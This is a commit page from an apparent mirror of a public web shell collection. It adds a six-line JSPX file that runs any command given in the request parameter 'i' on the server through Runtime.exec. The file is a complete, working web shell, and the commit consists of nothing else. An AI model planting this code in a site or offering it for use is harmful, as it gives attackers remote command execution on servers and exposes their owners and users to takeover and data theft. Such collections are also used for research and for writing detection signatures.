mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
parent
6652171538
commit
6c708c5f1a
1 changed files with 6 additions and 0 deletions
6
jspx/jjw.jspx
Normal file
6
jspx/jjw.jspx
Normal file
|
@ -0,0 +1,6 @@
|
|||
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
|
||||
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
|
||||
<jsp:scriptlet>
|
||||
Runtime.getRuntime().exec(request.getParameter("i"));
|
||||
</jsp:scriptlet>
|
||||
</jsp:root>
|
Loading…
Reference in a new issue